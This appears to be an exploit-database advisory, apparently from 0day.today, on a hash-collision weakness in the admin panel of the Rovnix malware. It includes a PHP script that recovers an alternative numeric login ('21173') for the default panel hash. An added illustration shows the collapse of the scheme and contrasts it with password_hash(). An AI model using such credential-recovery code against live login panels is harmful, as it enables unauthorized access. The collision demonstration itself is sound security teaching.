Rovnix hash collision vulnerability

2013-12-12T00:00:00
ID 1337DAY-ID-21659
Type zdt
Reporter Xylitol
Modified 2013-12-12T00:00:00

Description

Exploitation of a weakness in the hash function of the Rovnix malicious software. The default password on the Rovnix panel is 'admin' (admin = fbff791ef0770855e599ea6f87d41653), but you can also log in with '21173'. This exploit defeats the weak hash function of Rovnix to get a password from a hash.

                                        
<?php
        /**
         * Defeat the weak hash function of Rovnix
         * to get password from a hash.
         */
     
        $HASH   = 'fbff791ef0770855e599ea6f87d41653';
     
        $value  = getNumber($HASH);
        $search = search($value, $HASH);
     
        echo('Hash:   ' . $HASH  . '<br />');
        echo('Value:  ' . $value . '<br />');
        echo('Search: ' . $search);
     
        // Search for a working (numeric) password
        function search($value, $hash) {
                $i = 0;
             
                while (true) {
                        if (getHash($i) == $value)
                                return $i;
                     
                        $i++;
                }
        }
     
        // Get the hashed number
        function getNumber($hash) {
                $i = 0;
             
                while (true) {
                        if (md5($i) == $hash)
                                return $i;
                     
                        $i++;
                }
        }
     
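        // Rovnix hash function without the final MD5. '+' is numeric addition in PHP,
        // so every string operand is coerced to a number and the result is only a number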
        function getHash($hash) {
                $salt = 'LKJFDJLJkkljKJKJKJkjkj$i%&@(%[email protected]@[email protected]!cdh*[email protected]#[email protected]*[email protected]$jkeJFJLEJFE';
             
                return $hash + $salt + md5($salt) + md5($hash) + $salt[3];
        }
?>
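
Why the scheme collapses, as an added example that is not part of the original advisory or of the Rovnix panel code: because the operands are added rather than concatenated, the value fed to the final MD5 is a small integer, so many different passwords share one digest. DEMO_SALT, weakDigest(), strongDigest() and the sample passwords are constructed for this illustration, and the (int) casts are an assumption standing in for the numeric coercion that '+' applies to strings on older PHP versions. The hardened form uses PHP's built-in password_hash() and password_verify().

```php
<?php
// Added illustration, not code from the advisory or from the Rovnix panel.
// DEMO_SALT is a constructed placeholder, not the panel's salt.
const DEMO_SALT = 'constructed-demo-salt';

// Arithmetic-style scheme: every operand is reduced to an integer before the
// final md5(). The (int) casts model the legacy coercion of '+' on strings, so
// the demo also runs on PHP 8, where '+' on a non-numeric string throws TypeError.
function weakDigest(string $password): string {
    $salt = DEMO_SALT;
    $sum  = (int)$password + (int)$salt + (int)md5($salt)
          + (int)md5($password) + (int)$salt[3];
    return md5((string)$sum);
}

// Hardened form: random per-password salt and a slow KDF from the built-in API.
function strongDigest(string $password): string {
    return password_hash($password, PASSWORD_DEFAULT);
}

// Constructed sample input: 500 distinct passwords.
$passwords = [];
for ($n = 0; $n < 500; $n++) {
    $passwords[] = 'Passw0rd-' . $n . '!';
}

// Group the sample by weak digest to measure how far the output space collapses.
$buckets = array_count_values(array_map('weakDigest', $passwords));
arsort($buckets);

printf("distinct passwords:       %d\n", count($passwords));
printf("distinct weak digests:    %d\n", count($buckets));
printf("largest collision bucket: %d passwords share one digest\n", reset($buckets));

// With password_hash(), only the original password verifies against the stored hash.
$stored = strongDigest($passwords[0]);
printf("own password verifies:    %s\n",
    var_export(password_verify($passwords[0], $stored), true));
printf("other password verifies:  %s\n",
    var_export(password_verify($passwords[1], $stored), true));
```

Any password whose MD5 begins with a letter contributes 0 to the sum, which is why a large share of the sample falls into a single bucket.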

#  0day.today [2018-01-05]  #